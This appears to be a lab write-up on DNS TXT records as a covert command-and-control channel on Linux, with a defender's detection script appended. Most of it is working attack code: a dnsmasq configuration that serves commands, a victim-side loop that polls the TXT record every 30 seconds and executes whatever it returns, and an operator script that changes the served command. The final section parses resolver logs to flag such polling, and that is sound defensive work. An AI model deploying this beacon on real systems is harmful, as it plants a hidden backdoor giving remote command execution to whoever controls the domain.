DNS as a channel for persistence and C2 (Linux)
Description
This technique uses DNS queries to communicate with a remote server. The compromised system periodically queries a domain for TXT records, whose contents carry the encoded command. After executing the command locally, the system may send the results back over DNS or another channel. The method is stealthy because outbound DNS traffic is rarely inspected and is usually treated as benign.
Steps
- Install dnsmasq:

```bash
sudo apt install dnsmasq
```

- Create a file that holds the command to be served over DNS:

```bash
sudo mkdir -p /var/lib/dns-c2
echo "whoami" | sudo tee /var/lib/dns-c2/cmd.txt > /dev/null
```

- Temporarily add a dnsmasq configuration file:

```bash
sudo nano /etc/dnsmasq.d/dns-c2.conf
```

- Add the following. dnsmasq reads this file literally and does not expand shell syntax such as `$(cat ...)`, so the command text goes into the TXT record as-is (the helper script further down regenerates it from cmd.txt):

```
# Resolve cmd.evil locally and serve the command as its TXT record
address=/cmd.evil/127.0.0.1
txt-record=cmd.evil,"whoami"
```

- Restart dnsmasq:

```bash
sudo systemctl restart dnsmasq
```

- On the victim: a script that polls the TXT record every 30 seconds and runs whatever command it receives:

```bash
#!/bin/bash
while true; do
  # Ask the lab resolver (192.168.11.129, the dnsmasq host) for the TXT record and strip the quotes
  cmd=$(dig +short TXT cmd.evil @192.168.11.129 | sed 's/"//g')
  if [[ ! -z "$cmd" ]]; then
    echo "[*] Ejecutando comando recibido: $cmd"
    bash -c "$cmd"
  fi
  sleep 30
done
```

- Now on our machine, we create a file (dns-command.sh) that updates the served command:

```bash
#!/bin/bash
# Check that at least one parameter (the command) was given
if [ -z "$1" ]; then
  echo "Uso: $0 'comando' [ruta_adicional]"
  exit 1
fi

COMANDO="$1"
RUTA1="/var/lib/dns-c2/cmd.txt"
RUTA2="$2"

# Write the command to RUTA1
echo "$COMANDO" | sudo tee "$RUTA1" > /dev/null

# If RUTA2 was given, also write the command there
if [ ! -z "$RUTA2" ]; then
  echo "$COMANDO" | sudo tee "$RUTA2" > /dev/null
fi

# Regenerate the dnsmasq config from the command in RUTA1.
# Note: if /etc/dnsmasq.d/dns-c2.conf from the manual step still exists,
# dnsmasq will answer with both TXT records; remove it first.
echo "address=/cmd.evil/127.0.0.1" | sudo tee /etc/dnsmasq.d/cmd.conf > /dev/null
echo "txt-record=cmd.evil,\"$(cat "$RUTA1")\"" | sudo tee -a /etc/dnsmasq.d/cmd.conf > /dev/null

# Restart dnsmasq so the new record is served
sudo systemctl restart dnsmasq

echo "Comando actualizado en $RUTA1${RUTA2:+ y $RUTA2} y dnsmasq reiniciado."
```

- We can choose the command we want to execute:

```bash
sudo ./dns-command.sh "uname -a"
```
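As an added defender's counterpart to this lab (not part of the original page), the script below parses dnsmasq query-log lines and flags any client that asks for the same TXT record at a near-constant interval, which is exactly the footprint the 30-second polling loop above leaves on a resolver. The log sample is constructed, and the log format, the 2024 year and the thresholds (at least 4 queries, at most 20% interval jitter) are assumptions.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample of dnsmasq "log-queries" output (not captured from a real host):
# one client polls TXT cmd.evil every 30 s, another does ordinary A lookups.
SAMPLE_LOG = """\
Mar  3 10:00:00 gw dnsmasq[812]: query[TXT] cmd.evil from 192.168.11.140
Mar  3 10:00:30 gw dnsmasq[812]: query[TXT] cmd.evil from 192.168.11.140
Mar  3 10:00:41 gw dnsmasq[812]: query[A] example.org from 192.168.11.150
Mar  3 10:01:00 gw dnsmasq[812]: query[TXT] cmd.evil from 192.168.11.140
Mar  3 10:01:30 gw dnsmasq[812]: query[TXT] cmd.evil from 192.168.11.140
Mar  3 10:02:00 gw dnsmasq[812]: query[TXT] cmd.evil from 192.168.11.140
Mar  3 10:03:15 gw dnsmasq[812]: query[A] example.org from 192.168.11.150
"""
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ dnsmasq\[\d+\]: "
    r"query\[(?P<qtype>[A-Z]+)\] (?P<qname>\S+) from (?P<client>\S+)$"
)

def parse_queries(text, year=2024):
    """Yield (timestamp, client, qtype, qname) for each dnsmasq query line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:  # syslog lines carry no year, so one is supplied (assumed)
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["client"], m["qtype"], m["qname"]

def find_txt_beacons(text, min_queries=4, max_jitter=0.2):
    """Return {(client, qname): mean_gap_seconds} for timer-driven TXT pollers."""
    series = defaultdict(list)
    for ts, client, qtype, qname in parse_queries(text):
        if qtype == "TXT":
            series[(client, qname)].append(ts)
    beacons = {}
    for key, stamps in series.items():
        if len(stamps) < min_queries:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        # Coefficient of variation: near zero means a fixed sleep, not a human.
        if mean > 0 and statistics.pstdev(gaps) / mean <= max_jitter:
            beacons[key] = mean
    return beacons

if __name__ == "__main__":
    for (client, qname), gap in find_txt_beacons(SAMPLE_LOG).items():
        print(f"[!] {client} polls TXT {qname} every ~{gap:.0f}s")
```

Enable `log-queries` in dnsmasq (or feed the equivalent fields from any resolver or Zeek dns.log) and the same grouping works on production data; repeated TXT lookups for a single name are rare in normal client traffic, so this is a low-noise alert.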
Reference: Created by Luis Rivera